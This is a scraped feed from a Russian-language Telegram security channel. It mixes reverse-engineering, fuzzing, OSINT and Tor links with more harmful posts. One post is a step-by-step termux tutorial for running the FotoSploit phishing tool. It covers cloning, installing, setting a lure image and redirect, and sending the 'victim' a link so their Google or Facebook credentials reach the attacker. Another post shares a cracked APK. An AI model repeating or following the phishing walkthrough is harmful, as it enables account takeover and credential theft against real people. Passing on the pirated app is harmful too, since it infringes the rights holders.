C.I.T. Security
8.29K subscribers
2.93K photos
268 videos
4.22K files
4.22K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://t.me/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
Обучающий видео курс ReverseHero, язык английский, релиз 2021 года

ReversingHero is a Reverse Engineering self learning kit (x86_64 on linux) wrapped inside one binary file. It is made of 15 levels, with difficulty gradually increasing. This course contains step by step hints and solution videos for solving ReversingHero. To get the most of this course, you should try solving each level yourself, and watch the corresponding video only if you are stuck

Официальный сайт
https://www.reversinghero.com

Доп материалы для курса
https://gumroad.com/l/reversinghero

YouTube
https://bit.ly/3olVAmt

#reverse #education
Когда нужно фаззить веб-приложения не только кавычками, на помощь приходят мутирующие фаззеры. На вход они получают пользовательские данные, а на выходе измененные, заведомо некорректные данные. Это позволяет найти различного рода уязвимости и проверить веб-приложение и используемые там библиотеки на различные исключительные ситуации.

Первый и самый известный, Radamsa

Radamsa производит манипуляции с входными данными множеством разных неожиданных способов, включая чрезмерное повторение, инвертирование разрядов, вставку управляющих символов и т. д. Причем он годится для фаззинга как отдельных строк, так и заголовков, HTTP-запросов.

Второй, это jdam

Создан он для мутации именно json строк, когда нужно сохранить структуру, чтобы пройти валидацию данных. Помимо мутаций данных (по большей части позаимствованных у radamsa) он подмешивает различную полезную нагрузку именно для поиска веб-уязвимостей - вставляет лексемы NoSQL, нагрузку для шаблонизаторов, различные функции и операторы.
Raklet — малоизвестный поисковик по сети Tor. Без рекламы.

No profit, no javascript, no logs.

#Tor
https://www.geocreepy.com/
Это инструмент геолокационной разведки с открытым исходным кодом
xhns.audiobookstorrent-2.2-arm7.apk
10.3 MB
Аудиокниги Торрент до версии 2.2

Приложение для доступа к огромному архиву аудиокниг, размещённому на портале rutrackers. Позволяет искать, скачивать и послушивать аудиокниги. Похоже, поддерживает обход блокировок ресурса. Поддерживает проброс портов. Годнота 👍
В модификации получен PRO, сделан клон, удалена реклама и аналитика 😁

Требуется: Андроид 5.0+
Взлом аккаунта GOOGLE c помощью termux

PhotoSploit — софт, с помощью которого можно украсть авторизационные данные пользователя Google или Facebook.

Обновляем термукс:
pkg update
pkg upgrade

Качаем гит:
pkg install git 

Качаем саму утилиту:
git clone https://github.com/Cesar-Hack-Gray/FotoSploit.git

Переходим в директорию:
cd FotoSploit

Запускаем установку:
bash install.sh 

Запуск:
./FotoSploit

После запуска, нам необходимо найти картинку в формате .jpg с разрешением не более 430х430. И скопировать ее в директорию термукс.

Далее в утилите устанавливаем нашу картинку :
set foto <Fotografiya.jpg>

Задаем заголовок нашей страницы:
set title url <заголовок>

И задаем url на который будет перенаправлена жертва :
set title url <Google или Facebook>

Далее запускаем нашу страницу:
run

После этого утилита выведет ссылку на фишинг страницу, по которой должна перейти жертва. Далее жертва перейдет по нашей ссылке, у нее появится заставка, которая потребует авторизацию. Пока жертва находится на нашей странице, инструмент отправит нам информацию об ее геолокации, IP-адресе, DNS, версии ОС и так далее. Когда жертва введет логин и пароль в графу авторизации, то на атакующий хост придут все авторизационные данные.

Удачного дня ✌️
Энтропия_Как_хаос_помогает_искать_вирусы_—_«Хакер».pdf
1.3 MB
Энтропия. Как хаос помогает искать вирусы — «Хакер»
Большая подборка материалов по OSINT
https://mega.nz/folder/MhkCjLBL#QtBH6zO3ZjaXcnMjJz0V7g
tiktok_source-master (1).zip
41.8 MB
​​«TikTok — это механизм сбора данных, замаскированный под платформу социальных сетей»👀

Талантливый реверс-инженер с Github под ником "August" сумел произвести обратную разработку, получить исходный код приложения TikTok и опубликовал полученный исходный код на платформе разработчика👏🏻

Как выяснилось исходники содержат функции отслеживания местоположения, отслеживание телефонных звонков, создание скриншетов вашего экрана при открытии определенных приложений, мониторинг сетей Wi-Fi, сбор MAC-адресов и вычисление местоположения при помощи них, распознавание лиц, анализ нажатия ваших клавиш даже когда вы не пользуетесь приложением и еще множество отслеживающих функций.
👍1
Arbore-master.zip
1.3 MB
Arbore (github.com/MichaelMure/Arbore) - приложение для децентрализованного обмена файлами. Закрывающая проблему защиты от СОРМ и DLP систем
https://cirt.net/passwords сайт для поиска стандартных паролей для разных устройств